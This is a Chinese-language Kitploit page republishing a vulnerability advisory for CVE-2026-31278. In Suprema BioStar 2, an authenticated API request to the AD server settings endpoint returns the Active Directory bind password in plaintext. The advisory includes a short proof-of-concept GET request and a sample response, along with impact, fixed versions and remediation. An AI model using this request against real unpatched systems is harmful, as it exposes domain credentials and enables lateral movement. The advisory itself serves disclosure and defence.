Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-31278 — Suprema BioStar 2 中 Active Directory 凭据泄露漏洞的 CVE 分析 | Kitploit
工具/GitHubGitHub/mda1r/cve-2026-31278
漏洞扫描器密码攻击漏洞利用Web安全网络安全论文与研究
GitHubmda1r/cve-2026-31278

CVE-2026-31278

Suprema BioStar 2 中 Active Directory 凭据泄露漏洞的 CVE 分析

查看仓库
2个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-31278 Suprema BioStar 2:Active Directory 凭据泄露


元数据

字段详情
CVE IDCVE-2026-31278
厂商Suprema Inc.
产品BioStar 2
漏洞类型敏感信息泄露 / 凭据暴露
攻击向量远程 / 已认证 / 低复杂度
严重性高危
修复版本BioStar 2 v2.9.12 / BioStarX v1.0.2
研究人员Abdullah Alannaz

摘要

Suprema BioStar 2 存在一个敏感信息泄露漏洞,原因在于其对 Active Directory 集成设置的处理不当。后端 API 端点 /api/v2/setting/adserversetting 以明文形式返回 Active Directory 绑定账户的凭据,尽管该密码在管理界面中已被掩码显示。


受影响版本

  • BioStar 2 Core / AC v2.9.5.29
  • BioStar 2 T&A v2.9.5.3

技术详情

尽管密码字段在管理界面中已被掩码,但向后端 API 发出的已认证请求会泄露完整的未加密密码以及 LDAP 配置参数,其中包括禁用 SSL 通信的设置。

已认证的攻击者向 AD 服务器配置端点发送 HTTP GET 请求,即可在服务器响应中收到明文形式的 Active Directory 服务账户密码。

概念验证

请求:

root@kitploit:~
GET /api/v2/setting/adserversetting HTTP/1.1
Host: <target>
Authorization: Bearer <token>

响应:

root@kitploit:~
{
  "ad_server": "ldap://internal.domain.local",
  "bind_dn": "CN=svc_biostar,DC=domain,DC=local",
  "password": "<plaintext_password_returned_here>",
  "ssl_enabled": false
}

影响

已认证的攻击者可利用泄露的凭据进行以下操作:

  • 针对 Active Directory 执行 LDAP 身份验证
  • 枚举域用户、组和组织单位
  • 进行内部网络侦察
  • 在加入域的系统中进行横向移动
  • 视服务账户权限情况,可能进行权限提升

时间线

CVE-2026-31278 由 MITRE 分配 | 修复版本 BioStar 2 v2.9.12 / BioStarX v1.0.2 已发布 |


修复建议

  • 升级至 BioStar 2 v2.9.12 或 BioStarX v1.0.2
  • 立即轮换所有 Active Directory 服务账户凭据
  • 仅允许受信任的网络网段访问 API
  • 为 Active Directory 通信启用 LDAPS(SSL)

参考

  • Suprema Inc.: https://www.supremainc.com

致谢

Abdullah Alannaz 安全研究人员

该漏洞已向 Suprema 进行负责任披露。厂商确认了该问题,并与 MITRE 协调完成了 CVE 分配。

下载工具